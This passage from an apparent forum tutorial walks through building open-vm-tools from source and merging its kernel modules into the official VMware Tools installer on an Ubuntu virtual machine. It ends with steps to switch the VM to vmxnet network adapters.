And for the hack with the open tools I also installed the following (although some of these were found on sites describing what’s needed for Ubuntu with a GUI, some might be unnecessary):

Code:

sudo apt-get install libgtk2.0-dev
sudo apt-get install libproc-dev libdumbnet-dev xorg-dev
cd /tmp
sudo mkdir liburiparser
cd liburiparser
sudo wget http://ftp.ie.debian.org/debian/pool/main/u/uriparser/liburiparser1_0.7.2-0exp1_amd64.deb
sudo wget http://ftp.ie.debian.org/debian/pool/main/u/uriparser/liburiparser-dev_0.7.2-0exp1_amd64.deb
sudo dpkg -i liburiparser1_0.7.2-0exp1_amd64.deb
sudo dpkg –i liburiparser-dev_0.7.2-0exp1_amd64.deb
sudo apt-get install libicu-dev

Go to /tmp and download the open source version of the tools from here.

Code:

.tar.gz?modtime=1227030450&big_mirror=0

Unpack and build the open-vm-tools:

Code:

sudo tar xzvf open-vm-tools*.gz
cd open-vm-tools-2008.11.18-130226
sudo ./configure --includedir=/usr/include/uriparser
sudo make

In the VMware management console, right click on the VM and tell VMware to install the VM tools then copy the tools:

Code:

sudo mount /media/cdrom0
sudo cp -a /media/cdrom0/VMwareTools*.gz /tmp/
cd /tmp/
sudo tar -xzvf VMwareTools*.gz

From the open source modules/linux folder we have the vmblock, vmhgfs, vmmemctl, vmsync and vmxnet modules that we need to tar up and place into the official VMware tools tarball:

Code:

cd /tmp/open-vm-tools-2008.11.18-130226/modules/linux/
for i in *; do sudo mv ${i} ${i}-only; sudo tar -cf ${i}.tar ${i}-only; done
cd ../../..
sudo mv -f open-vm-tools-2008.11.18-130226/modules/linux/*.tar vmware-tools-distrib/lib/modules/source/

Now we can run the regular VMware tools installer accepting all the defaults:

Code:

cd /tmp/vmware-tools-distrib/
sudo ./vmware-install.pl

Activate the vmxnet drivers:

Code:

sudo /etc/init.d/networking stop
sudo depmod –a
sudo modprobe vmxnet 
sudo /etc/init.d/networking start

Shutdown with sudo

Code:

init 0

and in the management console edit the VM settings, delete the Network Adapter that was previously created and create new ones with vmxnet settings.
Start the VM and this step should be complete.